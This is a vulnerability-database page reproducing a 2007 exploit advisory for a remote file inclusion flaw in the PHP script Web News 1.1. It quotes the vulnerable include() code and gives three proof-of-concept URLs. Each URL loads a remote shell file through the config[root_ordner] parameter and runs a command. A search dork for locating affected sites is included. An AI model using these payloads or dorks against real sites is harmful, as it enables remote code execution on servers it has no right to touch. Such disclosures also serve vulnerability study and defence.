Lucene search

K

webnews-rfi.txt

🗓️ 11 Aug 2007 00:00:00Reported by RizgarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Web News 1.1 Remote Command Execution Vulnerability in Mapos-Scripts.d

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Web News 1.1 Remote Command Execution Vulnerability   
-----------------------------------------------------------------------  
  
  
Script : Web News   
  
Version : 1.1  
  
Site : http://www.mapos-scripts.de  
  
Founder : Rizgar  
  
Contact : [email protected] and irc.gigachat.net #kurdhack   
  
Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys)  
  
d0rk : "Copyright (c) 2007 by Mapos-Scripts.de", "Web News 1.1 and 1.0"  
-----------------------------------------------------------------------  
  
<?php  
session_start();  
include($config["root_ordner"].'config.php');  
if (file_exists($root_ordner.'install.php'))   
{  
echo "<meta http-equiv='refresh' content='0;URL=install.php'>";  
exit;  
}  
include($config["root_ordner"].'includes/dbconnect.php');  
include($config["root_ordner"].'includes/function.php');  
  
$header = style('index_body','header');  
echo $header;  
  
?>  
  
PoC   
  
http://www.site.com/path/index.php?config[root_ordner]=http://shell.txt?&cmd=id  
http://www.site.com/path/news.php?config[root_ordner]=http://shell.txt?&cmd=id  
http://www.site.com/path/feed.php?config[root_ordner]=http://shell.txt?&cmd=id  
  
..  
  
EOF  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
11 Aug 2007 00:00Current
0.1Low risk
Vulners AI Score0.1
20
.json
Report